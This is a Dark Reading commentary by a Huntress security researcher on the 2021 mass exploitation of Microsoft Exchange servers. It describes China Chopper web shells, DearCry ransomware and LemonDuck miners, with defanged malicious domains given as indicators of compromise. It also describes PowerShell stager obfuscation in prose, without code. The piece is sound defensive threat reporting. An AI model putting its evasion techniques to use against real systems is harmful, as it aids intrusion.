Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats

// // //
5/10/2021
10:00 AM
John Hammond
John Hammond
Commentary
Connect Directly
Twitter
LinkedIn
RSS
E-Mail vvv

Exchange Exploitation: Not Dead Yet

The mass exploitation of Exchange Servers has been a wake-up call, and it will take all parties playing in concert for the industry to react, respond, and recover.

"March Madness" is a jovial nickname for the third month of the year — but in 2021, the cybersecurity industry felt the brunt of March madness for a reason other than basketball: mass exploitation of Microsoft Exchange Servers. Almost two months later, we're still living in the aftermath of this widespread incident.

Related Content:

Microsoft Exchange Server Attacks: 9 Lessons for Defenders

Special Report: Assessing Cybersecurity Risk in Today's Enterprises

New From The Edge: 10K Hackers Defend the Planet Against Extraterrestrials

On March 1, Huntress learned about new vulnerabilities that would offer an unauthorized actor full control of a Microsoft Exchange server. These vulnerabilities were not yet disclosed, but enterprise organizations and small- to medium-sized businesses were already being exploited. On March 2, Microsoft released its first security advisory, warning companies about these dangerous vulnerabilities. Unfortunately, it seemed Microsoft's initial announcement missed the mark.

What became dubbed as "Exchange Marauder," Microsoft originally described as "limited and targeted [in scope]," yet practically every version of Exchange was vulnerable, and these servers are publicly facing on the open Internet. While cloud servers were not affected and only on-premises installations of Exchange were susceptible to this attack, soon more than 30,000 organizations in the US alone were known to be affected.

Some experts say attacks using these vulnerabilities began as early as January 6. A successful exploit chained together multiple vulnerabilities to eventually gain remote code execution (RCE) on the target host by dropping a "Web shell" in a publicly accessible location. These Web shells were unique files that would process and evaluate code on the server itself and allow anyone who knew the specific key or parameter to run commands and fully control the machine as an administrative user.

The early days of the month were filled with chaos and uncertainty. It was difficult to determine if the initial patches that Microsoft released were in effect, and if there was presence of any Web shell, you were already compromised, and the patch wouldn't help. The cybersecurity industry got scrappy: We were notifying individuals through Reddit, doing threat hunting and intelligence on Twitter, sharing indicators of compromise on GitHub and Pastebin ... whatever was the fastest method to disseminate information.

While the industry was screaming from the rooftops to patch, patch, patch, we also wanted to contribute to the threat intelligence and help inform organizations of potential indicators of compromise (IoCs). The most blatant IoC is a Web shell itself. These Web shells follow the structure of a "China Chopper," a nickname given to a style of simple, minimalist syntax to run a command supplied as part of the Web request.

These have typically been found in the C:\inetpub\wwwroot\aspnet_client directory or subdirectories, with unfamiliar or random filenames and a .aspx extension. (We have seen a large amount of variations to these Web shells and have been archiving them here.)

Initially, these Web shells seemed to slip past most every antivirus (AV), endpoint detection and response (EDR), or preventive security solution.

An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress
An excerpt of our inventoried Web shells, indicating the filename, when it was modified, and preventive security software installed on the host. The timestamps indicated in red are our earliest identified compromise, days before the initial reporting from Microsoft. Credit: Huntress

Prevention is hard. Now, just about every AV and EDR product will get ahead of this. It does show, however, that this small, simple syntax slipped by and shook up the industry.

After the Web shell is in place and the threat actors have gained access, the question becomes "what will they do next?" What becomes of these targets and victims after the compromise? While the hackers have complete administrative access, they could drop ransomware, farm this machine into a botnet, deface the victim's websites, steal and sell data … anything they would like.

We have since seen indicators of ransomware targeting these compromised Exchange Servers dubbed "DearCry." DearCry uses both AES and RSA cryptography and leaves files encrypted with a "DEARCRY!" header at the top of the file contents.

More often than ransomware, surprisingly, is evidence of cryptocurrency miners. An old family of cryptomining malware, "LemonDuck," has reemerged.

LemonDuck hides through multiple obfuscated payloads but uses RSA to validate each stage. While there are many domains and IoCs associated with LemonDuck, the most frequent that Huntress has seen as recently as March has been the http[:]//t[.]zker9[.]com and http[:]//t[.]zz3r0[.]com domains.

A persistent foothold of LemonDuck uses PowerShell to download another stager, validating it with RSA.

A clever trick that stagers like this use is appending the current date or time as a variable when requesting data from an external server. This gets around HTTP caching and ensures the content that is received is always the latest copy.

The downloaded code is then executed with "fileless malware" techniques using the IEX syntax, a PowerShell alias for "Invoke-Expression" that evaluates code on the fly. The next layer of code it pulls down runs yet another stager in memory, which is obfuscated by using reversed strings. All of these techniques are attempts for this malware to remain undetected by automated solutions or AV/EDR products.

After six stages of obfuscation, we see the raw source code of this LemonDuck malware written in PowerShell. It checks the architecture of the victim, detects the processor type, and downloads the appropriate mining software. LemonDuck installs its own persistence so it can continue to run on reboot and throttles the computer's resources to earn more money for the attacker.

Unfortunately, around 6% of Exchange Servers today have not been patched and are still vulnerable. These exploits can result in a full domain compromise and cannot be taken lightly.

Microsoft has released its April Security Update, disclosing even more critical vulnerabilities against Exchange. Allegedly, these vulnerabilities have been exploited in the wild, but the impetus to patch should be the same as in March. Two of these new vulnerabilities don't require authentication and can be triggered without user interaction, ultimately gaining the attacker RCE. These vulnerabilities are grave and should not be neglected. Threat hunters and security researchers will continue to monitor for any IoCs and share new information as it is released.

We cannot rely on automated solutions alone. Automation is divine, but manual analysis and human investigation are musts. China Chopper Web shells slid under the radar, post-access malware and Trojans continue to bypass defenses with clever obfuscation and evasion techniques — and this research requires context and expertise from security practitioners. While the mass exploitation of Exchange Servers has been a wake-up call, it takes all parties playing in concert for the industry to react, respond, and recover.

John Hammond is a Security Researcher at Huntress as well as a cybersecurity instructor, developer, red teamer, and CTF enthusiast. John is a former Department of Defense Cyber Training Academy curriculum developer and teacher for the Cyber Threat Emulation course, educating ... View Full Bio
Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Edge-DRsplash-10-edge-articles
I Smell a RAT! New Cybersecurity Threats for the Crypto Industry
David Trepp, Partner, IT Assurance with accounting and advisory firm BPM LLP,  7/9/2021
News
Attacks on Kaseya Servers Led to Ransomware in Less Than 2 Hours
Robert Lemos, Contributing Writer,  7/7/2021
Commentary
It's in the Game (but It Shouldn't Be)
Tal Memran, Cybersecurity Expert, CYE,  7/9/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
The 10 Most Impactful Types of Vulnerabilities for Enterprises Today
Managing system vulnerabilities is one of the old est - and most frustrating - security challenges that enterprise defenders face. Every software application and hardware device ships with intrinsic flaws - flaws that, if critical enough, attackers can exploit from anywhere in the world. It's crucial that defenders take stock of what areas of the tech stack have the most emerging, and critical, vulnerabilities they must manage. It's not just zero day vulnerabilities. Consider that CISA's Known Exploited Vulnerabilities (KEV) catalog lists vulnerabilitlies in widely used applications that are "actively exploited," and most of them are flaws that were discovered several years ago and have been fixed. There are also emerging vulnerabilities in 5G networks, cloud infrastructure, Edge applications, and firmwares to consider.
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2023-1142
PUBLISHED: 2023-03-27
In Delta Electronics InfraSuite Device Master versions prior to 1.0.5, an attacker could use URL decoding to retrieve system files, credentials, and bypass authentication resulting in privilege escalation.
CVE-2023-1143
PUBLISHED: 2023-03-27
In Delta Electronics InfraSuite Device Master versions prior to 1.0.5, an attacker could use Lua scripts, which could allow an attacker to remotely execute arbitrary code.
CVE-2023-1144
PUBLISHED: 2023-03-27
Delta Electronics InfraSuite Device Master versions prior to 1.0.5 contains an improper access control vulnerability in which an attacker can use the Device-Gateway service and bypass authorization, which could result in privilege escalation.
CVE-2023-1145
PUBLISHED: 2023-03-27
Delta Electronics InfraSuite Device Master versions prior to 1.0.5 are affected by a deserialization vulnerability targeting the Device-DataCollect service, which could allow deserialization of requests prior to authentication, resulting in remote code execution.
CVE-2023-1655
PUBLISHED: 2023-03-27
Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.4.0.